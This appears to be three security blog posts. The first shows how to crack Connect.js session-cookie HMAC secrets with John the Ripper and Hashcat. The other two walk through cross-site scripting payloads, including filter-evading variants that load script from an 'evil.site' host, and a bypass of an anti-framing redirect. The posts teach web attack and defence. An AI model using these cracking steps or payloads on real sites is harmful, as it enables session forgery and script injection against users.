
Oh, the secrets you’ll know if to GitHub you go. The phrases committed by coders exhibited a mistaken sense of security.

A password ensures, while its secrecy endures, a measure of proven identity.

Share that short phrase for the public to gaze at repositories open and clear. Then don’t be surprised at the attacker disguised with the secrets you thought were unknown.

*sigh*

It’s no secret that I gave a BlackHat presentation a few weeks ago. It’s no secret that the CSRF countermeasure we proposed avoids nonces, random numbers, and secrets. It’s no secret that GitHub is a repository of secrets.

And that’s how I got side-tracked for two days hunting secrets on GitHub when I should have been working on slides.

Your Secret

Security that relies on secrets (like passwords) fundamentally relies on the preservation of that secret. There’s no hidden wisdom behind that truism, no subtle paradox to grant it the standing of a koan. It’s a simple statement too often ignored, bent, and otherwise abused.



It started with research on examples of CSRF token implementations. But the hunt soon diverged from queries for `connect.sid` to tokens like `OAUTH_CONSUMER_SECRET`, to `ssh://` and `mongodb://` schemes. Such beasts of the wild had been noticed – they tend to roam with little hindrance.

Sometimes these beasts leap from cover into the territory of plaintext. Sometimes they remain camouflaged behind hashes and ciphers. Crypto functions conceal the nature of a beast, but the patient hunter will be able to discover it given time.

The mechanisms used to protect secrets, such as encryption and hash functions, are intended to maximize an attacker’s effort at trying to reverse-engineer the secret. The choice of hash function has no appreciable effect on a dictionary-based brute force attack (at least not until your dictionary or a hybrid-based approach reaches the size of the target keyspace). In the long run of an exhaustive brute force search, a “bigger” hash like SHA-512 would take longer than SHA-256 or MD5. But that’s not the smart way to increase the attacker’s work factor.

Iterated hashing techniques are more effective at increasing the attacker’s work factor. Such techniques have a tunable property that may be adjusted with regard to the expected cracking speeds of an attacker. For example, in the PBKDF2 algorithm, both the HMAC algorithm and number of rounds can be changed, so an HMAC-SHA1 could be replaced by HMAC-SHA256 and 1,000 rounds could be increased to 10,000. (The changes would not be compatible with each other, so you would still need a migration plan when moving from one setting to another.)
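A minimal sketch of that tunability, using Node.js’s built-in `crypto.pbkdf2Sync`. The `derive` and `verify` helpers, the `$`-separated record format, and the sample password are assumptions made for illustration; they aren’t taken from any particular site.

```javascript
const crypto = require('crypto');

// Hypothetical helper: PBKDF2 with a caller-chosen HMAC digest and round count.
// The parameters are stored next to the hash so a later login can reproduce it.
function derive(password, salt, digest, rounds) {
  const key = crypto.pbkdf2Sync(password, salt, rounds, 32, digest);
  return [digest, rounds, salt.toString('hex'), key.toString('hex')].join('$');
}

// Recompute with the parameters found in the stored record, then compare.
function verify(password, record) {
  const [digest, rounds, saltHex] = record.split('$');
  const candidate = derive(password, Buffer.from(saltHex, 'hex'), digest, Number(rounds));
  return candidate.length === record.length &&
    crypto.timingSafeEqual(Buffer.from(candidate), Buffer.from(record));
}

const salt = crypto.randomBytes(16); // a fresh random salt per password
const oldRecord = derive('correct horse', salt, 'sha1', 1000);
const newRecord = derive('correct horse', salt, 'sha256', 10000);
```

Because each record carries its own digest name and round count, old and new settings can coexist while a migration is under way: `verify` works against either record, and a successful login is a convenient moment to re-derive with the stronger settings.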

Of course, the choice of work factor must be balanced with a value you’re willing to encumber the site with. The number of “nonce” events for something like CSRF is far more frequent than the number of “hash” events for authentication. For example, a user may authenticate once in a one-hour period, but visit dozens of pages during that same time.

Our Secret

But none of that matters if you’re relying on a secret that’s easy to guess, like default passwords. And it doesn’t matter if you’ve chosen a nice, long passphrase that doesn’t appear in any dictionary if you’ve checked that password into a public source code repository.

In honor of the password cracking chapter of the upcoming AHTK 4th Edition, we’ll briefly cover how to guess HMAC values.

We’ll use the Connect JavaScript library for Node.js as a target for this guesswork. It contains a CSRF countermeasure that relies on nonces generated via an HMAC. This doesn’t mean Connect.js implements the HMAC algorithm incorrectly or contains a design error. It just means that the security of an HMAC relies on the secrecy of its password.

Here’s a snippet of the Connect.js code in action. Note the default secret, `keyboard cat`.

    ...
    var app = connect()
      .use(connect.cookieParser())
      .use(connect.session({ secret: 'keyboard cat' }))
      .use(connect.bodyParser())
      .use(connect.csrf())
    ...

If you come across a web app that sets a `connect.sess` or `connect.sid` cookie, then it’s likely to have been created by this library. And it’s just as likely to be using a bad password for the HMAC. Let’s put that to the test with the following cookies.

    Set-Cookie: connect.sess=s%3AGY4Xp1AWB5PVzYHCANaXHznO.PUvao3Y6%2FXxLAG%2Bp4xQEBAcbqMCJPACQUvS2WCfsmKU; Path=/; Expires=Fri, 28 Jun 2013 23:13:52 GMT; HttpOnly
    Set-Cookie: connect.sid=s%3ATdF%2FriiKHfdilCTc4W5uAAhy.qTtH9ZL5pxgClGbZ0I0E3efJTrdC0jia6YxFh3cWKrU; path=/; expires=Fri, 28 Jun 2013 22:51:58 GMT; httpOnly
    Set-Cookie: connect.sid=CJVZnS56R6NY8kenBhhIOq0h.0opeJzAPZ3efz0dw5YJrGqVv4Fi%2BWVIThEsGHMRqDw0; Path=/; HttpOnly

Everyone’s Secret

John the Ripper is a venerable password guessing tool with ancient roots in the security community. Its rule-based guessing techniques and speed make it a powerful tool for cracking passwords. In this case, we’re just interested in its ability to target the HMAC-SHA256 algorithm.
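Stripped of rules and speed, a dictionary attack against an HMAC is a loop. The sketch below assumes the signature is HMAC-SHA256 computed over the session value with the secret as the key; `sign` and `guessSecret` are hypothetical names for illustration, not part of John or Connect.

```javascript
const crypto = require('crypto');

// Compute HMAC-SHA256 of a message under a candidate secret, as hex.
function sign(message, secret) {
  return crypto.createHmac('sha256', secret).update(message).digest('hex');
}

// Try each candidate secret until one reproduces the observed signature.
// Returns the matching secret, or null if the word list is exhausted.
function guessSecret(message, signatureHex, candidates) {
  for (const candidate of candidates) {
    if (sign(message, candidate) === signatureHex) {
      return candidate;
    }
  }
  return null;
}

// Self-contained demonstration with a signature we generate ourselves.
const demoMessage = 'example-session-value';
const demoSignature = sign(demoMessage, 'keyboard cat');
const found = guessSecret(demoMessage, demoSignature, ['password', 'secret', 'keyboard cat']);
```

Nothing here is clever. The attacker never reverses the hash; the attack succeeds only when the secret is already sitting in the list of guesses.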

First, we need to reformat the cookies into a string that John recognizes. For these cookies, resolve the percent-encoded characters, drop the leading `s:` marker where it’s present, convert the base64 signature that follows the dot into hexadecimal, and replace the dot (.) with a hash (#). Some of the cookies contained a JSON-encoded version of the session value, others contained only the session value.
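That reformatting is easy to script. This sketch assumes the cookie value has the shape `s:<value>.<base64 signature>` (with the `s:` marker optional), which matches the cookies shown earlier; `splitSignedCookie` and `toJohn` are hypothetical helper names.

```javascript
// Split a signed cookie value into the signed payload and a hex signature.
function splitSignedCookie(cookieValue) {
  let decoded = decodeURIComponent(cookieValue); // resolve %3A, %2F, %2B, ...
  if (decoded.startsWith('s:')) {
    decoded = decoded.slice(2);                  // drop the "s:" marker
  }
  const dot = decoded.lastIndexOf('.');          // the signature follows the last dot
  const payload = decoded.slice(0, dot);
  const signatureHex = Buffer.from(decoded.slice(dot + 1), 'base64').toString('hex');
  return { payload, signatureHex };
}

// Format a cookie value as payload#hex-signature.
function toJohn(cookieValue) {
  const { payload, signatureHex } = splitSignedCookie(cookieValue);
  return `${payload}#${signatureHex}`;
}

const line = toJohn(
  's%3AGY4Xp1AWB5PVzYHCANaXHznO.PUvao3Y6%2FXxLAG%2Bp4xQEBAcbqMCJPACQUvS2WCfsmKU'
);
```

Since `splitSignedCookie` returns the two parts separately, they can be rearranged for any tool that wants a different order or separator.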

    GY4Xp1AWB5PVzYHCANaXHznO#3d4bdaa3763afd7c4b006fa9e3140404071ba8c0893c009052f4b65827ec98a5
    TdF/riiKHfdilCTc4W5uAAhy#a93b47f592f9a718029466d9d08d04dde7c94eb742d2389ae98c458777162ab5
    CJVZnS56R6NY8kenBhhIOq0h#d28a5e27300f67779fcf4770e5826b1aa56fe058be595213844b061cc46a0f0d

Next, we unleash John against it. The first step might use a dictionary, such as a words.txt file you might have lying around. (The book covers more techniques and clever use of rules to target password patterns. John’s own documentation can also get you started.)

    $ ./john --format=hmac-sha256 --wordlist=words.txt sids.john

Review your successes with the `--show` option.

    $ ./john --show sids.john

Hashcat is another password guessing tool. It takes advantage of GPU processors to emphasize rate of guesses. It requires a slightly different format for the HMAC-SHA256 input file. The order of the hash and salt is reversed from John, and it requires a colon separator.

    3d4bdaa3763afd7c4b006fa9e3140404071ba8c0893c009052f4b65827ec98a5:GY4Xp1AWB5PVzYHCANaXHznO
    a93b47f592f9a718029466d9d08d04dde7c94eb742d2389ae98c458777162ab5:TdF/riiKHfdilCTc4W5uAAhy
    d28a5e27300f67779fcf4770e5826b1aa56fe058be595213844b061cc46a0f0d:CJVZnS56R6NY8kenBhhIOq0h

Hashcat uses numeric references to the algorithms it supports. The following command runs a dictionary attack against hash algorithm 1450, which is HMAC-SHA256.

    $ ./hashcat-cli64.app -a 0 -m 1450 sids.hashcat words.txt

Review your successes with the `--show` option.

    $ ./hashcat-cli64.app --show -a 0 -m 1450 sids.hashcat words.txt

All sorts of secrets lurk in GitHub. Of course, the fundamental problem is that they shouldn’t be there in the first place. There are many more types of secrets than hashed passphrases, too.

• • •

A common theme among injection attacks that manifest within a JavaScript context (e.g. `<script>` tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is: choose a parameter (or a cookie!), find if and where its value shows up in a page, hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.
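A minimal sketch of why two reflection points help, assuming a hypothetical page template that drops both parameters into one statement and a hypothetical filter that inspects each parameter on its own. The names `renderScript`, `passesFilter`, and `isValidSyntax` are invented for illustration.

```javascript
// Hypothetical server-side template: both parameters land in one statement.
function renderScript(a, b) {
  return `var a = ${a}, b = ${b};`;
}

// Hypothetical naive filter: rejects any single parameter containing "alert".
function passesFilter(value) {
  return !/alert/i.test(value);
}

// Parse the code without running it; new Function() throws on a syntax error.
function isValidSyntax(code) {
  try {
    new Function(code);
    return true;
  } catch (err) {
    return false;
  }
}

// Each half looks harmless alone. A comment opened in the first parameter
// and closed in the second swallows the template text between them.
const first = 'window["ale"/*';
const second = '*/+"rt"](9)';
const rendered = renderScript(first, second);
// rendered is: var a = window["ale"/*, b = */+"rt"](9);
```

Neither value contains the string the filter is looking for, yet the page that stitches them together produces syntactically valid JavaScript that looks up `window["alert"]` at run time.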

This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments: https://web.site/TimeZone.aspx?start=1&end=2

The app uses these values inside a `<script>` block, as follows:

    var start = 1, end = 2;
    $(JM.Scheduler.TimeZone.init(start, end));
    foo.init();

The “normal” attack is simple:

    https://web.site/TimeZone.aspx?start=alert(9);//&end=2

This results in a successful `alert()`, but the app has some sort of silly check that strips the `end` value if it’s not greater than the `start`. Thus, you can’t have `start=2&end=1`. And the comparison always fails if you use a string for `start`, because `end` will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of security deficiency.

    var start = alert(9);//, end = ;
    $(JM.Scheduler.TimeZone.init(start, end));
    foo.init();

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to `end`, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

    ReferenceError: Can't find variable: $

Let’s see what we can do to help. For starters, we’ll just assign `start` to `end` (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them – but only because we want a clean error console upon delivering the attack.

    https://web.site/TimeZone.aspx?start=alert(9);//&end=start;$=null

    var start = alert(9);//, end = start;$=null;
    $(JM.Scheduler.TimeZone.init(start, end));
    foo.init();

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.

    https://web.site/TimeZone.aspx?start=window["ale"/*&end=*/%2b"rt"](9)

    var start = window["ale"/* end = */+"rt"](9);
    $(JM.Scheduler.TimeZone.init(start, end));
    foo.init();

Rather than think about different ways to pop an `alert()` in someone’s browser, think about what could be possible if jQuery was already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:

    https://web.site/TimeZone.aspx?start=$["getSc"%2b"ript"]("https://evil.site/"&end=undefined)

    var start = $["getSc"+"ript"]("https://evil.site/", end = undefined);
    $(JM.Scheduler.TimeZone.init(start, end));
    foo.init();

And if it’s necessary to further obfuscate the payload we might try this:

    https://web.site/TimeZone.aspx?start=%22getSc%22%2b%22ript%22&end=$[start]%28%22//evil.site/%22%29

    var start = "getSc"+"ript", end = $[start]("//evil.site/");
    $(JM.Scheduler.TimeZone.init(start, end));
    foo.init();

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later – two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts three years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Timelord, of course. In particular, someone that preceded all that music: Tom Baker.

Jelly Baby, anyone?

• • •


It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied `alert()`. Sometimes, parsing an expression takes more effort than breaking it.

Turn your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with:

    https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="

The page reflects the value of this `id` parameter within an `href` attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

    <a href="mailto:support@redacted?subject=error ref: "onmouseover=alert(9);a=""> support@redacted </a>

Yet the browser goes into an infinite redirect loop without ever launching the `alert`. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the `<body>` element – well after several other JavaScript functions and page content. It should have been present in the `<head>`. It’s like the developers knew they should do something about clickjacking, heard about a `top.location` trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

    <script>
    if (window.top.location != 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="') {
      window.top.location.href = 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="';
    }
    </script>

The URL in your browser bar may look exactly like the URL in the inequality test. However, the `location.href` property contains the URL-encoded (a.k.a. percent encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new `location.href`. As such, the following two strings are not identical:

    https://redacted/UnknownError.aspx?id=%22onmouseover=alert(9);a=%22
    https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="

Since the anti-framing triggers before the browser encounters the affected `href`, the `onmouseover` payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your `onhack` event from the `href` to the `if` statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected. It makes the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the `alert()` and a Boolean operator to force a false outcome.

The new payload is

    '+alert(9)&&null=='

Which results in this:

    <script>
    if (window.top.location != 'https://redacted/UnknownError.aspx?id='+alert(9)&&null=='') {
      window.top.location.href = 'https://redacted/UnknownError.aspx?id='+alert(9)&&null=='';
    }
    </script>

Note that we could have used other operators to glue the `alert()` to its preceding string. Any arithmetic operator would have worked.

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates. Perhaps the presence of “null” might flag the URL as a SQL injection attempt. We wouldn’t want to be defeated by a lucky WAF rule. All of the following alternate tests return false:

    undefined == ''
    [] != ''
    [] === ''

This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with different execution contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. `<script>`) after the `href`, but the `if` statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page – URL encoding would have been a logical step.
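Both halves of this trick can be checked outside a browser. The sketch below runs under Node.js, so `alert` and `topLocation` are stand-ins for the browser’s `alert()` and `window.top.location`; they are assumptions for illustration, not the page’s real objects.

```javascript
// 1. Percent-encoding: the parsed URL no longer equals the raw string,
//    which is why the original inequality test always redirected.
const raw = 'https://redacted/UnknownError.aspx?id="onmouseover=alert(9);a="';
const href = new URL(raw).href;
const mismatch = href != raw;

// 2. Stand-ins so the injected condition can be evaluated here.
const alerts = [];
const alert = (value) => { alerts.push(value); };
const topLocation = href;

// Same shape as the condition produced by the '+alert(9)&&null==' payload.
// Precedence: + binds first, then != and ==, then &&. So alert(9) runs
// while the left side is evaluated, and null == '' makes the result false.
const redirects =
  topLocation != 'https://redacted/UnknownError.aspx?id=' + alert(9) && null == '';
```

Here `mismatch` comes out true and `redirects` comes out false, with one call recorded in `alerts`: the payload fires and the page stays put.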